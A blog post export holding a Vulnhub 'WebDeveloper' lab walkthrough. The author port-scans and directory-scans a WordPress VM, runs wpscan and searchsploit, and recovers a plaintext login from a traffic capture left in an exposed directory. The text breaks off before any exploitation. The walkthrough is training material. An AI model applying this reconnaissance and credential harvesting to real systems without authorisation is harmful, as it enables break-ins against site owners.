{"id":405,"date":"2024-03-17T01:04:17","date_gmt":"2024-03-16T17:04:17","guid":{"rendered":"http:\/\/162.14.82.114\/?p=405"},"modified":"2024-03-17T01:04:17","modified_gmt":"2024-03-16T17:04:17","slug":"vulnhub-webdeveloper","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/405\/03\/17\/2024\/","title":{"rendered":"Vulnhub&#8211;WebDeveloper"},"content":{"rendered":"<h1>WebDeveloper<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103354.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103354.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316114613262\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>For some reason this target VM downloaded really slowly... It got much better after I switched to another node!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103356.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103356.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316232155403\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Let's begin!<\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.37.129 -- -A -sV -sT<\/code><\/pre>\n<pre><code class=\"language-text\">.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.37.129:22\nOpen 192.168.37.129:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-16 11:23 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nInitiating Ping Scan at 11:23\nScanning 192.168.37.129 [2 ports]\nCompleted Ping Scan at 11:23, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 11:23\nCompleted Parallel DNS resolution of 1 host. at 11:23, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 11:23\nScanning 192.168.37.129 [2 ports]\nDiscovered open port 22\/tcp on 192.168.37.129\nDiscovered open port 80\/tcp on 192.168.37.129\nCompleted Connect Scan at 11:23, 0.00s elapsed (2 total ports)\nInitiating Service scan at 11:23\nScanning 2 services on 192.168.37.129\nCompleted Service scan at 11:23, 7.84s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.37.129.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 1.10s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.03s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNmap scan report for 192.168.37.129\nHost is up, received syn-ack (0.00071s latency).\nScanned at 2024-03-16 11:23:03 EDT for 9s\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb 
(RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkgdNJs41OI0TFS67l3c9wTuvs\/SD7S5kVwofnV5wkDIYa5grQc1J7C1qSImXlX2MQ02Y6VbcsebLpy4NqyAgtV+VBCEqWu6FujA2kwaWN+yL781GaEd3\/Jze9a6Uxse4p5O6\/5TtPeh5bVJTqFALQ9sjsZpwD528x9FfPdmK9voAKD3pzFWLBI4WaKqh2Xy+d3mDLQOc+dULhOymdiuGh+UcaSVQN9WSy9NeECWYxhy\/pkpMGZS4DaVNGsHmQfQicjtaRhPYg8r2ICeAdgpZ2aQWpe1fcUW58t\/uj3eauU3VRJNqiy+yp7hV+dwxrl9NqFKtmTlRvGvy3G8mLRyhJ\n|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLrmTuklXg8ulgnCnC8YZZLKR9LbMSSW7QfxBsJUDjgBMVP6PsHYHlNaEY+oHfZtjU2L5VyQufGKoyvaS4CC30k=\n|   256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJddm5Qctin2VSmNmkU8zAOzC5y1+4W1u+4ygqepqjKi\n80\/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: WordPress 4.9.8\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Example site &amp;#8211; Just another WordPress site\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:23\nCompleted NSE at 11:23, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.01 seconds<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/192.168.37.129 -d 1 -x* -C 404<\/code><\/pre>\n<pre><code class=\"language-text\"> ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.10.1\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.37.129\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt\n \ud83d\udca2  Status Code Filters   \u2502 [404]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.1\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [*]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 1\n \ud83c\udf89  New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the 
Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      322c http:\/\/192.168.37.129\/wp-includes =&gt; http:\/\/192.168.37.129\/wp-includes\/\n301      GET        9l       28w      321c http:\/\/192.168.37.129\/wp-content =&gt; http:\/\/192.168.37.129\/wp-content\/\n301      GET        9l       28w      319c http:\/\/192.168.37.129\/wp-admin =&gt; http:\/\/192.168.37.129\/wp-admin\/\n301      GET        9l       28w      317c http:\/\/192.168.37.129\/ipdata =&gt; http:\/\/192.168.37.129\/ipdata\/\n200      GET       43l       43w     1045c http:\/\/192.168.37.129\/wp-includes\/wlwmanifest.xml\n200      GET        2l      281w    10056c http:\/\/192.168.37.129\/wp-includes\/js\/jquery\/jquery-migrate.min.js\n200      GET      225l      400w     3646c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/css\/ie8.css\n200      GET      209l      846w     5836c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/jquery.scrollTo.js\n200      GET      249l      928w     7682c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/global.js\n200      GET        1l        9w     1398c http:\/\/192.168.37.129\/wp-includes\/js\/wp-embed.min.js\n200      GET      369l     2389w   204846c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/images\/header.jpg\n200      GET       31l       90w      683c 
http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/skip-link-focus-fix.js\n500      GET        0l        0w        0c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/\n200      GET      326l     1144w    10330c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/assets\/js\/html5.js\n200      GET        6l     1435w    97184c http:\/\/192.168.37.129\/wp-includes\/js\/jquery\/jquery.js\n200      GET     4327l     8642w    83401c http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/style.css\n301      GET        0l        0w        0c http:\/\/192.168.37.129\/index.php\/ =&gt; http:\/\/192.168.37.129\/\n405      GET        1l        6w       42c http:\/\/192.168.37.129\/xmlrpc.php\n200      GET        1l     2533w    52609c http:\/\/192.168.37.129\/index.php\/wp-json\n200      GET       63l      173w     2160c http:\/\/192.168.37.129\/wp-login.php\n200      GET      319l     3642w    52813c http:\/\/192.168.37.129\/\n[####################] - 7s     30044\/30044   0s      found:21      errors:0      \n[####################] - 7s     30000\/30000   4539\/s  http:\/\/192.168.37.129\/  <\/code><\/pre>\n<p>This is clearly a <code>wordpress<\/code> site, but we still need to be careful.<\/p>\n<h3>Wappalyzer Plugin Information<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103357.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103357.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000022561\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Exploitation<\/h2>\n<p>Visit the site:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103358.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103358.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316234844071\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Look for anything interesting:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103359.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103359.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316234932483\" 
\/><\/div><\/p>\n<p>A login page! I tried the universal-password trick and could not get in; common weak passwords did not work either.<\/p>\n<p>I tried SQL injection as well and still could not get in, so let's scan with <code>WPScan<\/code>:<\/p>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/192.168.37.129<\/code><\/pre>\n<pre><code class=\"language-text\">_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.37.129\/ [192.168.37.129]\n[+] Started: Sat Mar 16 11:56:41 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.29 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.37.129\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - 
https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.37.129\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.37.129\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.37.129\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/192.168.37.129\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n |  - http:\/\/192.168.37.129\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2024-01-16T00:00:00.000Z\n | Readme: http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 3.5\n | Style URL: http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. 
With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.7 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.37.129\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8, Match: &#039;Version: 1.7&#039;\n[+] Enumerating All Plugins (via Passive Methods)\n[i] No plugins Found.\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 &lt;======================================================================================================================&gt; (137 \/ 137) 100.00% Time: 00:00:00\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https:\/\/wpscan.com\/register\n\n[+] Finished: Sat Mar 16 11:56:47 2024\n[+] Requests Done: 171\n[+] Cached Requests: 5\n[+] Data Sent: 42.774 KB\n[+] Data Received: 358.097 KB\n[+] Memory used: 274.473 MB\n[+] Elapsed time: 00:00:05<\/code><\/pre>\n<h3>Vulnerability Discovery<\/h3>\n<p>Search for vulnerabilities in this version:<\/p>\n<pre><code class=\"language-bash\">searchsploit wordpress 4.9.8<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103360.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103360.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000134837\" \/><\/div><\/p>\n<p>None of them looks easy to use.<\/p>\n<p>Try the password recovery function:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103361.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103361.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000218925\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Look for more information:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103362.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103362.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317000318236\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<p>Going back over the earlier information gathering, there is an odd directory:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.37.129\/ipdata\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103363.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103363.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317001101631\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Download this traffic capture file and follow the traffic:<\/p>\n<p>First the TCP traffic, nothing much there:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103364.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103364.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317001348036\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>Look at the rest, ideally to find login information; filter on strings and take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103365.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103365.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317001919494\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Found a username and password; try logging in.<\/p>\n<pre><code class=\"language-apl\">webdeveloper\nTe5eQg&amp;4sBS!Yr$)wf%(DcAd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103366.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103366.png\" 